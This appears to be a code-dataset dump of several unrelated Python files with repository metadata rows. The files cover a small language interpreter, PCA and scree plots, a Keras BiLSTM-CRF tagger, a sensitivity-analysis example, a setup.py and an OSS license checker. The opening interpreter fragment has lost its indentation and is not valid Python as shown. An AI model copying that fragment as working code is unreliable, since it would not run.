                            f'unknown builtin func: {bfunc}({len(args)})')
r = mtd(r, *args)
else:
r = self._run(p)
else:
log.append(f'prog {name}')
try:
cp = prog.p.r()
except:
print(f'error occurred at prog {name}')
raise
log.extend(cp.log)
log.append(f'looped {cp.turns}')
r = cp.m
return r
def run(self, name):
self.clog = []
self.obuf = []
r = self._run(name)
self.log.extend(self.clog)
return self.obuf
def showcode(self, name):
if not name in self.progs:
raise KeyError(f'invalid prog name: {name}')
print(f'{name}:')
prog = self.progs[name]
if isinstance(prog, list):
seq = prog
for p in seq:
if isinstance(p, tuple):
bfunc, args = p
print(f'{bfunc}(', *args, ')')
else:
self.showcode(p)
else:
seq = prog.p.s.seq
for i, (cshift, condi, op) in enumerate(seq):
print('period', i+1)
print(' cshift:', cshift)
print(' condi:', condi)
print(' op:', op)
def builtin_out_0(self, last):
mdr = last
self.obuf.append(mdr.allregs)
return mdr
def builtin_out_1(self, last, p):
mdr = last
self.obuf.append(mdr.getreg(p))
return mdr
if __name__ == '__main__':
def test1():
from modron import c_modron
with open('test1.mdr.txt', 'r') as fd:
raw = fd.read()
md = c_modron()
p = c_parser(c_lexer(raw), md.cmplr)
p.parse()
return p, md
p, md = test1()
| 26.509395 | 77 | 0.448968 | 1,557 | 12,698 | 3.60501 | 0.127168 | 0.036879 | 0.020844 | 0.025655 | 0.409941 | 0.381614 | 0.333155 | 0.274185 | 0.229111 | 0.21664 | 0 | 0.007142 | 0.415577 | 12,698 | 478 | 78 | 26.564854 | 0.749225 | 0.001811 | 0 | 0.440476 | 0 | 0 | 0.079145 | 0.001973 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111905 | false | 0.007143 | 0.002381 | 0.011905 | 0.197619 | 0.016667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df8a6798247986c50a85f8670d6092c7023d686b | 4,501 | py | Python | application/pca.py | AdamuKaapan/natrium | b94527b287ec2c626be2fe37208bb043aab68b48 | [
"BSD-2-Clause"
] | null | null | null | application/pca.py | AdamuKaapan/natrium | b94527b287ec2c626be2fe37208bb043aab68b48 | [
"BSD-2-Clause"
] | 13 | 2018-04-03T20:34:17.000Z | 2018-04-20T08:33:50.000Z | application/pca.py | AdamuKaapan/natrium | b94527b287ec2c626be2fe37208bb043aab68b48 | [
"BSD-2-Clause"
] | null | null | null | #! /usr/bin/env python3
""" Standalone script for evaluating a dataset.
Calculates measures of label quality and tries to spot outliers.
Usage:
    python3 pca.py <filename>"""
import argparse
import pandas as pd
import numpy as np
import math
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def center_and_scale(frame):
"""Centers and scales a pandas dataframe"""
def center_scale_col(col):
        if (pd.api.types.is_numeric_dtype(col)):
            mean = col.mean()
            dev = col.std()
            # standard z-score: subtract the mean, then divide by the std dev
            col = (col - mean)/dev
        return col
return frame.apply(center_scale_col)
def calculate_scree(S):
    """Calculates information for scree plot"""
    # squared singular values are proportional to the variance explained
    # by each principal component
    S2 = S**2
    S2 = S2/sum(S2)
    return S2, np.cumsum(S2)
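# e.g. (assumed toy singular values): calculate_scree(np.array([3.0, 2.0, 1.0]))
# -> variance fractions ~[0.643, 0.286, 0.071] and their cumulative sums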
def plot_scree(scores, cum_scores):
"""Displays the scree and cumulative scree plot in the same figure"""
x = np.linspace(1, scores.shape[0], scores.shape[0])
fig, ax = plt.subplots()
ax.plot(x, scores,label="variance")
ax.plot(x, cum_scores, label="cumulative_variance")
ax.set(xlabel='Principal Component', ylabel='Variance',
title='Scree Plots')
ax.grid(True)
ax.legend()
def calculate_loading(V):
    # squared loadings, re-signed so each entry keeps its original direction
    return np.divide(V**2, np.sign(V))
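# e.g. (assumed): a loading of -0.5 maps to -0.25 and +0.5 maps to +0.25;
# magnitudes are squared while signs are preserved (zero entries yield nan).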
def plot_loading_vectors(V2):
size = math.ceil(math.sqrt(V2.shape[0]))
fig, axes = plt.subplots(size, size, figsize=(19,15))
vectors = [label if label % 2 != 0 else "" for label in range(1,23)]
for i, row in enumerate(axes):
for j, ax in enumerate(row):
idx = i*size+j
if (idx < V2.shape[0]):
graph = ax.bar(range(1,23), V2[idx],tick_label=vectors)
y_lim = np.max(np.abs(V2[idx])) + 0.1
ax.set_ylim([-y_lim, y_lim])
ax.set(title="Vector %d" % (idx + 1), xlabel="Original Dimension", ylabel="Importance" )
ax.axhline(lw = 0.5,color="black")
else:
ax.axis("off")
fig.suptitle("Loading Vector Plots", size = 18)
fig.tight_layout()
fig.subplots_adjust(top=0.9)
plt.savefig("../visualizations/loading_vectors.png")
def plot_features_3d(size, data, labels, cols, axes_labels, series_names, series_label, title):
"""makes a 3d plot of a set of data"""
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
sample = labels.sample(n=size)
for label, series in sample.groupby(sample):
        idx = series.index
        # .loc replaces the removed pandas .ix indexer
        ax.scatter(data.loc[idx, cols[0]], data.loc[idx, cols[1]], data.loc[idx, cols[2]], depthshade=False, label = label)
ax.set_xlabel(axes_labels[0])
ax.set_ylabel(axes_labels[1])
ax.set_zlabel(axes_labels[2])
ax.set_title(title, y=1.08)
ax.legend()
def main():
"""The executable to read in the specified data file and perform the
investigatory operations."""
parser = argparse.ArgumentParser()
parser.add_argument(
"input_file",
type=argparse.FileType("r"),
help="The path of the data file to read in.")
args = parser.parse_args()
    # read the pickled dataframe and normalize column dtypes
    data_frame = pd.read_pickle(args.input_file.name).infer_objects()
genre_list = ["Punk", "Electronic","RnB", "Rap", "Country", "Metal", "Pop", "Rock"]
data_frame = data_frame[data_frame["genre"].isin(genre_list)]
print(data_frame.columns)
data_frame = center_and_scale(data_frame)
labels = data_frame["genre"]
data_frame = data_frame.drop(columns=["genre", "release_year"])
u, s, v = np.linalg.svd(data_frame, full_matrices = False)
ur = np.dot(u, np.diag(s))
regular_scores = pd.DataFrame(data=ur, index = data_frame.index, columns = range(1, ur.shape[1]+1))
scores, cumulative_scores = calculate_scree(s)
plot_scree(scores, cumulative_scores)
v2 = calculate_loading(v)
plot_loading_vectors(v2)
plot_features_3d(
150,
data_frame,
labels,
["duration", "word_count", "rhyme_value"],
["Duration (s)", "Words (ct)", "Rhyme Index"],
genre_list,
"genre",
"Duration v. Wordcount v. Rhyme Index")
plot_features_3d(
150,
regular_scores,
labels,
[1, 2, 3],
["PC 1", "PC 2", "PC 3"],
genre_list,
"genre",
"Vector 1 v. Vector 2 v. Vector 3")
plt.show()
if __name__ == "__main__":
main()
| 31.041379 | 120 | 0.614974 | 629 | 4,501 | 4.260731 | 0.36725 | 0.043657 | 0.015672 | 0.014552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023655 | 0.248611 | 4,501 | 144 | 121 | 31.256944 | 0.768776 | 0.107976 | 0 | 0.116505 | 0 | 0 | 0.111362 | 0.009301 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07767 | false | 0 | 0.07767 | 0.009709 | 0.194175 | 0.009709 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df8adf88d2253216c359a48351327728bebbd134 | 4,241 | py | Python | seq2annotation/trainer/cli_keras_with_static_constraint.py | shfshf/seq2annotation | d4bf88a869631b43fa2974c2ffa1c5dd6a7623ed | [
"Apache-2.0"
] | 90 | 2018-11-29T07:05:16.000Z | 2021-11-22T11:32:58.000Z | seq2annotation/trainer/cli_keras_with_static_constraint.py | shfshf/seq2annotation | d4bf88a869631b43fa2974c2ffa1c5dd6a7623ed | [
"Apache-2.0"
] | 50 | 2019-06-27T07:11:18.000Z | 2022-02-10T00:01:02.000Z | seq2annotation/trainer/cli_keras_with_static_constraint.py | lanSeFangZhou/seq2annotation | a824520d46f0b3d70268fae422976a5ce1b3f4ce | [
"Apache-2.0"
] | 23 | 2019-01-03T14:57:15.000Z | 2022-03-08T07:50:33.000Z | import json
import os
from collections import Counter
import numpy as np
import tensorflow as tf
from tensorflow.python.keras import models
from tensorflow.python.keras.layers import Embedding, Bidirectional, LSTM
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras import layers
from ioflow.configure import read_configure
from ioflow.corpus import get_corpus_processor
from seq2annotation.input import generate_tagset, Lookuper, \
index_table_from_file
from tf_crf_layer.crf_helper import allowed_transitions
from tf_crf_layer.layer import CRF
from tf_crf_layer.loss import crf_loss
from tf_crf_layer.metrics import crf_accuracy
from tokenizer_tools.tagset.converter.offset_to_biluo import offset_to_biluo
config = read_configure()
corpus = get_corpus_processor(config)
corpus.prepare()
train_data_generator_func = corpus.get_generator_func(corpus.TRAIN)
eval_data_generator_func = corpus.get_generator_func(corpus.EVAL)
corpus_meta_data = corpus.get_meta_info()
tags_data = generate_tagset(corpus_meta_data['tags'])
train_data = list(train_data_generator_func())
eval_data = list(eval_data_generator_func())
tag_lookuper = Lookuper({v: i for i, v in enumerate(tags_data)})
vocab_data_file = os.path.join(os.path.dirname(__file__), '../data/unicode_char_list.txt')
vocabulary_lookuper = index_table_from_file(vocab_data_file)
def one_hot(a, num_classes):
return np.squeeze(np.eye(num_classes)[a.reshape(-1)])
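def _one_hot_example():
    # Hedged sanity check (hypothetical labels, not part of the original
    # script): 3 labels over 4 classes give a (3, 4) one-hot matrix.
    labels = np.array([0, 2, 3])
    return one_hot(labels, 4)  # rows: [1,0,0,0], [0,0,1,0], [0,0,0,1]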
def preprocess(data, maxlen=None, intent_lookup_table=None):
raw_x = []
raw_y = []
raw_intent = []
for offset_data in data:
tags = offset_to_biluo(offset_data)
words = offset_data.text
# label = offset_data.extra_attr['domain']
tag_ids = [tag_lookuper.lookup(i) for i in tags]
word_ids = [vocabulary_lookuper.lookup(i) for i in words]
raw_x.append(word_ids)
raw_y.append(tag_ids)
# raw_intent.append(label)
# if not intent_lookup_table:
# raw_intent_set = list(set(raw_intent))
# intent_lookup_table = Lookuper({v: i for i, v in enumerate(raw_intent_set)})
# intent_int_list = [intent_lookup_table.lookup(i) for i in raw_intent]
if not maxlen:
maxlen = max(len(s) for s in raw_x)
x = tf.keras.preprocessing.sequence.pad_sequences(raw_x, maxlen,
padding='post') # right padding
# lef padded with -1. Indeed, any integer works as it will be masked
# y_pos = pad_sequences(y_pos, maxlen, value=-1)
# y_chunk = pad_sequences(y_chunk, maxlen, value=-1)
y = tf.keras.preprocessing.sequence.pad_sequences(raw_y, maxlen, value=0,
padding='post')
# intent_np_array = np.array(intent_int_list)
# intent_one_hot = one_hot(intent_np_array, np.max(intent_np_array) + 1)
intent_one_hot = None
return x, intent_one_hot, y, intent_lookup_table
train_x, train_intent, train_y, intent_lookup_table = preprocess(train_data, 25)
test_x, test_intent, test_y, _ = preprocess(eval_data, 25, intent_lookup_table)
EPOCHS = 10
EMBED_DIM = 64
BiRNN_UNITS = 200
vocab_size = vocabulary_lookuper.size()
tag_size = tag_lookuper.size()
allowed = allowed_transitions("BIOUL", tag_lookuper.inverse_index_table)
model = Sequential()
model.add(Embedding(vocab_size, EMBED_DIM, mask_zero=True))
model.add(Bidirectional(LSTM(BiRNN_UNITS // 2, return_sequences=True)))
model.add(CRF(tag_size, transition_constraint=allowed))
# print model summary
model.summary()
callbacks_list = []
# tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=config['summary_log_dir'])
# callbacks_list.append(tensorboard_callback)
#
# checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
# os.path.join(config['model_dir'], 'cp-{epoch:04d}.ckpt'),
# load_weights_on_restart=True,
# verbose=1
# )
# callbacks_list.append(checkpoint_callback)
model.compile('adam', loss=crf_loss, metrics=[crf_accuracy])
# The intent branch above is commented out, so train_intent/test_intent are
# None; train on the token inputs alone.
model.fit(
    train_x, train_y,
    epochs=EPOCHS,
    validation_data=(test_x, test_y),
    callbacks=callbacks_list
)
# tf.keras.experimental.export_saved_model(model, config['saved_model_dir'])
| 32.875969 | 90 | 0.741335 | 614 | 4,241 | 4.806189 | 0.288274 | 0.028465 | 0.040325 | 0.033887 | 0.163673 | 0.120637 | 0.077262 | 0.048119 | 0 | 0 | 0 | 0.006175 | 0.159868 | 4,241 | 128 | 91 | 33.132813 | 0.82206 | 0.240981 | 0 | 0.027778 | 0 | 0 | 0.015649 | 0.009077 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.236111 | 0.013889 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df8ecfcf14d1349c62ad20d2cef2d653f9568c1a | 1,932 | py | Python | source_code/scree_plot.py | sdyinzhen/AutoBEL | 213011ef8c6d2bcc16ac92a263e615f4a7033ff4 | [
"MIT"
] | 8 | 2020-05-15T13:57:54.000Z | 2022-02-23T23:21:15.000Z | source_code/scree_plot.py | sdyinzhen/AutoBEL | 213011ef8c6d2bcc16ac92a263e615f4a7033ff4 | [
"MIT"
] | 1 | 2020-02-28T13:42:45.000Z | 2020-03-02T19:12:22.000Z | source_code/scree_plot.py | sdyinzhen/AutoBEL | 213011ef8c6d2bcc16ac92a263e615f4a7033ff4 | [
"MIT"
] | 7 | 2019-10-24T09:57:25.000Z | 2022-02-23T23:20:50.000Z | #Author: David Zhen Yin
#Contact: yinzhen@stanford.edu
#Date: September 11, 2018
import numpy as np
import matplotlib.pyplot as plt
def scree_plot(input_data, data_name, keep_info_prcnt, plotORnot):
    '''This is the PCA scree plot function.
    It also reports the number of PCs that preserve the assigned amount of information in the input_data.
    input_data: original input matrix for the PCA analysis.
    data_name: name of the input data, e.g. 'model', 'data'.
    keep_info_prcnt: the amount of information (cumulative variance ratio, in percent) to preserve after PCA.
    plotORnot: 'plot' - produce the scree plot; 'not' - no plot, only return the PC count for the required percentage of variance.
'''
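    # Hedged usage sketch (hypothetical 100x10 matrix, not part of the
    # original module):
    #   n_pcs = scree_plot(np.random.randn(100, 10), 'demo', 95, 'not')
    # returns the number of PCs needed to keep 95% of the variance.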
X = input_data-input_data.mean(axis=0)
    # Use eigh (the Gram matrix is symmetric) and sort the eigenvalues in
    # descending order; np.linalg.eig gives no ordering guarantee.
    eig_val, eig_vec = np.linalg.eigh(X.dot(X.transpose()))
    eig_val = eig_val[::-1]
    eig_vec = eig_vec[:, ::-1]
eigval_sum = np.sum(eig_val)
infor_list = np.cumsum(eig_val)/eigval_sum
infor_list = np.array(np.where(infor_list<=keep_info_prcnt/100))[0]
if plotORnot == 'plot':
plt.figure(figsize=(6, 4))
plt.plot(np.arange(1,len(eig_val)+1), np.cumsum(eig_val)/eigval_sum, \
marker='o', markersize=5, linestyle = 'dashed', color='blue')
plt.xticks(fontsize = 14)
plt.yticks(np.arange(0,1.01,0.1),fontsize = 14)
plt.xlabel('number of PCs', fontsize = 12, weight='bold')
plt.ylabel('cumulative variance ratio', fontsize = 12, weight='bold')
plt.title('Dimension reduction of ' + data_name +' - PCA scree plot', fontsize=18, loc='left', style='italic')
plt.grid(linestyle='dashed')
plt.axhline(y=keep_info_prcnt/100, linewidth=2, color='red', linestyle='--')
plt.axvline(x=infor_list[-1]+1, linewidth=2, color='red', linestyle='--')
plt.text(infor_list[-1]-2, -0.06, str(infor_list[-1]+1), fontsize=14, weight='bold', color='red')
return infor_list[-1]+1 | 55.2 | 128 | 0.669772 | 294 | 1,932 | 4.285714 | 0.44898 | 0.05 | 0.04127 | 0.02619 | 0.120635 | 0.084127 | 0 | 0 | 0 | 0 | 0 | 0.032092 | 0.193582 | 1,932 | 35 | 129 | 55.2 | 0.776637 | 0.30176 | 0 | 0 | 0 | 0 | 0.103156 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df911bbf31e9124090bd4e868dde32db29f1bbb5 | 2,395 | py | Python | examples/e3_sensitivity_analysis_example.py | RWTH-EBC/AixCaliBuHA | 2f01035d3c966b465dedf9243674fbb3b35ac7f0 | [
"MIT"
] | 2 | 2021-09-01T07:25:28.000Z | 2021-09-16T16:47:45.000Z | examples/e3_sensitivity_analysis_example.py | RWTH-EBC/AixCaliBuHA | 2f01035d3c966b465dedf9243674fbb3b35ac7f0 | [
"MIT"
] | 19 | 2021-09-06T14:36:44.000Z | 2022-03-30T06:20:42.000Z | examples/e3_sensitivity_analysis_example.py | RWTH-EBC/AixCaliBuHA | 2f01035d3c966b465dedf9243674fbb3b35ac7f0 | [
"MIT"
] | null | null | null | """
Example file for the senstivity_analyzer package. The usage of modules and classes inside
the senanalyzer package should be clear when looking at the examples.
If not, please raise an issue.
Goals of this part of the examples:
1. Learn how to execute a sensitivity analysis
2. Learn how to automatically select sensitive tuner parameters
"""
from aixcalibuha import SobolAnalyzer
def run_sensitivity_analysis(sim_api, cal_classes):
"""
Example process of a sensitivity analysis.
    First, the sensitivity analyzer is set up; in this example the
    Sobol method is used with the first-order index `S1` as the
    analysis variable.
    Afterwards, the sen_analyzer instance runs the sensitivity
    analysis in the next step.
    The result of this analysis is then printed to the user.
    The select_by_threshold function is presented as well, using a
    threshold of 0.01 on the `S1` results.
:param aixcalibuha.simulationapi.SimulationAPI sim_api:
        Simulation api to run the simulation for the sensitivity analysis
:param list cal_classes:
List of :meth:`calibration-class<aixcalibuha.data_types.CalibrationClass>`
objects to be analyzed.
:return: A list calibration classes
:rtype: list
"""
# Setup the class
sen_analyzer = SobolAnalyzer(
sim_api=sim_api,
num_samples=10,
cd=sim_api.cd,
analysis_variable='S1'
)
result, classes = sen_analyzer.run(calibration_classes=cal_classes)
print("Result of the sensitivity analysis")
print(result)
print("Selecting relevant tuner-parameters using a fixed threshold:")
sen_analyzer.select_by_threshold(calibration_classes=cal_classes,
result=result,
threshold=0.01)
for cal_class in cal_classes:
print(f"Class '{cal_class.name}' with parameters:\n{cal_class.tuner_paras}")
return classes
if __name__ == "__main__":
from examples import setup_fmu, setup_calibration_classes
# Parameters for sen-analysis:
EXAMPLE = "B" # Or choose A
SIM_API = setup_fmu(example=EXAMPLE)
CALIBRATION_CLASSES = setup_calibration_classes(example=EXAMPLE)[0]
# Sensitivity analysis:
CALIBRATION_CLASSES = run_sensitivity_analysis(sim_api=SIM_API,
cal_classes=CALIBRATION_CLASSES)
| 38.015873 | 89 | 0.699791 | 303 | 2,395 | 5.356436 | 0.39934 | 0.029575 | 0.012323 | 0.030807 | 0.034504 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005495 | 0.240084 | 2,395 | 62 | 90 | 38.629032 | 0.886264 | 0.473069 | 0 | 0 | 0 | 0 | 0.144915 | 0.030508 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.08 | 0 | 0.16 | 0.16 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df91d1ada3f3d05c025daba9488ddff7b71f714b | 1,985 | py | Python | setup.py | seek-ai/esengine | 5e17c5fa9b6990963e3e61e6010ce7c177c9b2c5 | [
"MIT"
] | 53 | 2017-04-29T16:39:13.000Z | 2022-01-25T23:46:31.000Z | setup.py | seek-ai/esengine | 5e17c5fa9b6990963e3e61e6010ce7c177c9b2c5 | [
"MIT"
] | 9 | 2017-11-22T18:22:17.000Z | 2020-06-05T19:26:07.000Z | setup.py | seek-ai/esengine | 5e17c5fa9b6990963e3e61e6010ce7c177c9b2c5 | [
"MIT"
] | 13 | 2017-10-27T13:44:04.000Z | 2021-02-28T12:33:04.000Z | # coding: utf-8
import os
import re
try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup, find_packages
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except (IOError, ImportError):
long_description = "Elasticsearch ODM inspired on MongoEngine"
def fpath(name):
return os.path.join(os.path.dirname(__file__), name)
def read(fname):
return open(fpath(fname)).read()
# grep esengine/__init__.py since python 3.x cannot import it
file_text = read(fpath('esengine/__init__.py'))
def grep(attrname):
pattern = r"{0}\W*=\W*'([^']+)'".format(attrname)
strval, = re.findall(pattern, file_text)
return strval
setup(
name='esengine',
version=grep('__version__'),
url='https://github.com/seek-ai/esengine',
license='MIT',
author="Catholabs",
author_email="catholabs@catho.com",
description='Elasticsearch ODM inspired on MongoEngine',
long_description=long_description,
packages=find_packages(),
include_package_data=True,
zip_safe=False,
platforms='any',
extras_require={
"es0": ["elasticsearch<1.0.0"],
"es1": ["elasticsearch>=1.0.0,<2.0.0"],
"es2": ["elasticsearch>=2.0.0,<3.0.0"]
},
install_requires=["python-dateutil", "six==1.10.0"],
tests_require=[
"pytest==2.8.3",
"pytest-cov==2.2.0",
"flake8==2.5.0",
"pep8-naming==0.3.3",
"flake8-debugger==1.4.0",
"flake8-print==2.0.1",
"flake8-todo==0.4",
"radon==1.2.2"
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
]
)
| 26.824324 | 66 | 0.617632 | 246 | 1,985 | 4.853659 | 0.495935 | 0.008375 | 0.062814 | 0.065327 | 0.080402 | 0.080402 | 0 | 0 | 0 | 0 | 0 | 0.038015 | 0.218136 | 1,985 | 73 | 67 | 27.191781 | 0.731314 | 0.03728 | 0 | 0.033333 | 0 | 0 | 0.380503 | 0.039832 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.116667 | 0.033333 | 0.216667 | 0.016667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df91f102ccd7ef11d324316885afcaaad8f975b0 | 9,350 | py | Python | oss-compliance/check-oss-licenses.py | rickibm/daml | 679d42a21bce320e11ccbba77fbb8d29a2b38db9 | [
"Apache-2.0"
] | null | null | null | oss-compliance/check-oss-licenses.py | rickibm/daml | 679d42a21bce320e11ccbba77fbb8d29a2b38db9 | [
"Apache-2.0"
] | null | null | null | oss-compliance/check-oss-licenses.py | rickibm/daml | 679d42a21bce320e11ccbba77fbb8d29a2b38db9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env runpipenv
# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
import os
import xml.etree.ElementTree as ET
import sys
import csv
import re
import argparse
import os.path
NO_LICENSE = 'No license information available'
STRIP_PATTERN = ' \t\n\r'
LICENSES_WHITE_LIST_FILE = 'LICENSES_WHITE_LIST.csv'
PACKAGES_WHITE_LIST_FILE = 'PACKAGES_WHITE_LIST.csv'
WHITE_LISTED_LICENSES = []
WHITE_LISTED_PACKAGES = []
def load_white_listed_licenses(white_listed_licenses_file):
script_dir = os.path.dirname(__file__)
print("Loading %s" % white_listed_licenses_file)
white_listed_licenses = []
with open(os.path.join(script_dir, white_listed_licenses_file)) as csvfile:
oss_white_lists = csv.DictReader(csvfile, delimiter=',', quotechar='"')
for row in oss_white_lists:
white_listed_licenses.append(
{'license detail': row['license detail'],
'license group': row['license group'],
'info': row['info']})
print("White listed licenses: %s" % white_listed_licenses)
return white_listed_licenses
def load_white_listed_packages(white_listed_packages_file):
script_dir = os.path.dirname(__file__)
print("Loading %s" % white_listed_packages_file)
white_listed_packages = []
with open(os.path.join(script_dir, white_listed_packages_file)) as csvfile:
packages_white_lists = csv.DictReader(csvfile, delimiter=',', quotechar='"')
for row in packages_white_lists:
white_listed_packages.append(
{'language': row['language'],
'package': row['package'],
'info': row['info']})
print("White listed packages: %s" % white_listed_packages)
return white_listed_packages
def enrich_dependency_with_compliance(dependency):
compliance = is_dependency_compliant(dependency, WHITE_LISTED_LICENSES, WHITE_LISTED_PACKAGES)
dependency.update(
{'is_compliant': compliance['is_compliant'],
'additional_info': compliance['additional_info']})
return dependency
def retrieve_java_dependency_licenses(dependency):
licenses = []
for license in dependency.find('licenses').findall('license'):
license_name = license.find('name').text
license_url = license.find('url').text if license.find('url') is not None else 'Not Available'
licenses.append({'license_name': license_name, 'license_url': license_url})
if not licenses:
licenses.append({'license_name': NO_LICENSE, 'license_url': ''})
return licenses
def retrieve_java_dependencies(maven_file):
root = ET.parse(maven_file).getroot()
dependencies = []
for dependency in root.iter('dependency'):
group_id = dependency.find('groupId').text
artifact_id = dependency.find('artifactId').text
version = dependency.find('version').text
java_dependency = {
'language': 'java',
'package': group_id,
'artifact': artifact_id,
'version': version,
'licenses': retrieve_java_dependency_licenses(dependency),
}
dependencies.append(enrich_dependency_with_compliance(java_dependency))
return dependencies
def read_csv_file(filename):
    with open(filename, 'r', newline='') as csvfile:
        print(csvfile.name)
        reader = csv.reader(csvfile, quoting=csv.QUOTE_MINIMAL, strict=True, delimiter=",")
        next(reader)  # skip the header row
csv_list = list(reader)
dependencies = []
for row in csv_list:
dependency = convert_row(row)
dependencies.append(enrich_dependency_with_compliance(dependency))
return dependencies
def convert_row(row):
name = row[2]
license_match = re.search('["]?(.*)[(](.*)[)]', row[1])
    if license_match:
        license_url = license_match.group(2)
        license_name = license_match.group(1).strip()
    else:
        print("ERROR: Could not parse license field %s" % row[1])
        sys.exit(1)
name_match = re.search('(.*) # (.*) # (.*)', name)
if name_match:
name_path = name_match.group(1).strip()
name_lib = name_match.group(2).strip()
name_version = name_match.group(3).strip()
    else:
        print("ERROR: Could not parse library name %s" % name)
        sys.exit(1)
return {
'category': row[0],
'language': "Java",
'licenses': [{'license_name': license_name, 'license_url': license_url}],
'artifact': name_lib,
'package': name_path,
'version': name_version
}
def save_dependencies_as_csv(dependencies, output_file):
csv_file = open(output_file, 'w')
csv_file.write("compliant,language,package,artifact,version,license_name,license_url\n")
for dependency in dependencies:
for license in dependency['licenses']:
csv_line = "\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\"\n" % (
dependency['is_compliant'],
dependency['language'],
dependency['package'],
dependency['artifact'],
dependency['version'],
license['license_name'],
license['license_url'],
dependency['additional_info'])
csv_file.write(csv_line)
csv_file.close()
def is_package_white_listed(package, white_listed_packages):
for white_listed_package in white_listed_packages:
if white_listed_package['package'].strip(STRIP_PATTERN) in package.strip(STRIP_PATTERN):
return {'is_white_listed': True,
'additional_info': white_listed_package['info'],
'type': 'package'}
return {'is_white_listed': False}
def is_license_white_listed(licenses, white_listed_licenses):
for license in licenses:
for white_listed_license in white_listed_licenses:
if white_listed_license['license detail'].strip(STRIP_PATTERN).lower() == license['license_name'].strip(
STRIP_PATTERN).lower():
return {'is_white_listed': True,
'additional_info': white_listed_license['info'],
'type': 'license'}
return {'is_white_listed': False}
def is_dependency_compliant(dependency, white_listed_licenses, white_listed_packages):
license = is_license_white_listed(dependency['licenses'], white_listed_licenses)
package = is_package_white_listed(dependency['package'], white_listed_packages)
if license['is_white_listed']:
return {'is_compliant': True, 'additional_info': license['additional_info']}
elif package['is_white_listed']:
return {'is_compliant': True, 'additional_info': package['additional_info']}
else:
return {'is_compliant': False, 'additional_info': 'not found'}
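def _compliance_example():
    # Hedged sketch (hypothetical data, not part of the original script):
    # a dependency passes if either its license or its package is white-listed.
    dep = {'package': 'org.example.lib',
           'licenses': [{'license_name': 'Apache License 2.0',
                         'license_url': 'https://example.org'}]}
    licenses = [{'license detail': 'Apache License 2.0', 'info': 'approved'}]
    packages = [{'package': 'org.other', 'info': 'internal'}]
    return is_dependency_compliant(dep, licenses, packages)
    # -> {'is_compliant': True, 'additional_info': 'approved'}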
def retrieve_all_dependencies(java_dependencies_file, java_dependencies_format):
print('Parsing java dependencies file: %s:' % java_dependencies_file)
java_dependencies = {}
if java_dependencies_format == "XML":
java_dependencies = retrieve_java_dependencies(java_dependencies_file)
if java_dependencies_format == "CSV":
java_dependencies = read_csv_file(java_dependencies_file)
return java_dependencies
def should_fail_build(dependencies):
should_fail = False
print("Analyzing the list of dependencies ...\n")
for dependency in dependencies:
if not dependency['is_compliant']:
print("Dependency %s:%s:%s is not compliant " % (
dependency['language'], dependency['package'], dependency['artifact']))
should_fail = True
return should_fail
def args_parsing():
parser = argparse.ArgumentParser(description='Validate the license for 3rd party libraries')
parser.add_argument('--java-deps', dest='java_dependencies_file', required=True,
help='generated by mvn license plugin')
parser.add_argument('--fail-build', dest='fail_build', required=False, default='yes',
help='fail build if no compliant dependencies are found (yes / no, default is yes)')
